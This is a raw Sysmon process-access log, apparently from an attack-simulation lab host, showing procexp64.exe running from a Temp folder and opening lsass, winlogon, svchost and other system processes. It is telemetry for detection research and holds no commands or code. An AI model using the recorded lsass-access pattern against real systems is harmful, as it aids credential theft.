15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787775Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787774Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787773Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787772Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787771Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787770Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787769Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787768Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787767Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787766Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787765Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787764Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787763Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787762Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787761Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787760Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787759Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787758Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787757Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787756Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787755Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787754Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787753Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.033{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787988Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787987Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 